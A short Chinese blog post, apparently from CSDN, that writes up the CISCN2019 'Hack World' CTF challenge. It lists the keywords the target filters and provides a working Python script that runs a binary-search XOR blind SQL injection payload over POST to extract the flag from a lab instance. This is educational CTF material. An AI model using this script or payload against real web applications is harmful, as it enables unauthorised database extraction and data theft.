[CISCN2019 华北赛区 Day2 Web1]

浪_zi

于 2020-08-30 15:34:19 发布

阅读量114

点赞数

分类专栏： CTF

本文链接：https://blog.youkuaiyun.com/yao_xin_de_yuan/article/details/108306162

版权

CTF 专栏收录该内容

15 篇文章

订阅专栏

本文深入探讨了SQL盲注的高级技巧，包括数字型盲注、异或注入及二分法POST注入等方法。通过具体实例，展示了如何绕过常见过滤如or、||、空格、#，并利用未过滤的if、逗号、substr等函数进行攻击。文章提供了Python脚本，用于自动化执行SQL盲注过程，以获取目标系统的敏感信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Hack World

数字型盲注 异或注入 二分法 POST注入
过滤了or、||、空格、#
未过滤if、逗号、substr、ascill、select、from、左右括号

import requests
import time
url="http://3820bdac-9613-4057-bfb0-5d88973f7c2d.node3.buuoj.cn/index.php"
flag=""
for i in range(0,50):#flag长度，跑到一半可修改此值，继续跑后边的数据
    print(i,":")
    low=32
    high=128
    mid = (low+high)//2
    while low<=high:
        #print(mid)
    #for j in range(32,128):#可见字符长度
        data={
            "id":"1^if(ascii(substr((select(flag)from(flag)),{0},1))>{1},0,1)".format(i,mid)
            }
        t = requests.post(url,data=data)
        #print(t.text)
        if("glzjin wants a girlfriend" in t.text):
            low=mid+1
            mid = (low+high)//2
        else:
            high=mid-1
            mid = (low+high)//2
    flag+=chr(high+1)
    print(flag)
    time.sleep(2)